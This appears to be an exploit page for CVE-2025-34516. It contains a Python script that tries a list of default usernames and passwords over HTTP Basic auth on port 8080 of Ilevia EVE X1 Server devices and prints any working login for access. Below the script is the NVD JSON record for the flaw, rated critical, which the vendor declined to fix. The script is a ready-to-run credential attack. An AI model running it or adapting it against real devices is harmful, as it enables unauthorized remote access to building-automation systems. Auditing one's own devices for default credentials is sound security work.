CVE-2025-34516

#!/usr/bin/env python3 # CVE-2025-34516 - Ilevia EVE X1 Server Default Credentials Exploit # Exploits use of default credentials on port 8080 import requests import sys import argparse from requests.auth import HTTPBasicAuth TARGET_PORT = 8080 DEFAULT_CREDENTIALS = [ ("admin", "admin"), ("admin", "password"), ("admin", "1234"), ("admin", ""), ("root", "root"), ("user", "user"), ("admin", "ilevia"), ("administrator", "administrator"), ] def check_default_credentials(target_url): """Attempt login with default credentials against the target.""" print(f"[*] Target: {target_url}") print(f"[*] Testing default credentials...") for username, password in DEFAULT_CREDENTIALS: try: response = requests.get( target_url, auth=HTTPBasicAuth(username, password), timeout=10, verify=False ) if response.status_code == 200: print(f"[+] SUCCESS! Default credentials found:") print(f" Username: {username}") print(f" Password: {password}") return True, username, password elif response.status_code == 401: print(f"[-] Failed: {username}/{password}") except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}") return False, None, None print("[-] No default credentials worked.") return False, None, None def main(): parser = argparse.ArgumentParser( description="CVE-2025-34516 - Ilevia EVE X1 Default Credentials Checker" ) parser.add_argument("target", help="Target IP address or hostname") args = parser.parse_args() target_url = f"http://{args.target}:{TARGET_PORT}" success, user, pwd = check_default_credentials(target_url) if success: print(f"\n[!] Device is VULNERABLE to CVE-2025-34516") print(f"[!] Use credentials {user}:{pwd} to access the device") sys.exit(0) else: print(f"\n[+] Device does not appear vulnerable or is not reachable.") sys.exit(1) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-34516", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:36.067", "lastModified": "2025-11-03T19:15:52.317", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain a use of default credentials vulnerability that allows an unauthenticated attacker to obtain remote access. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1392"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.18.0", "matchCriteriaId": "25D89BA5-1632-4243-BE68-D42803774A22"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:*", "matchCriteriaId": "72B4F8B5-4641-4371-8759-3AB18EC87FB6"}]}]}], "references": [{"url": "https://www.ilevia.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ilevia-eve-x1-server-use-of-default-credentials", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5963.php", "source": "[email protected]"}]}}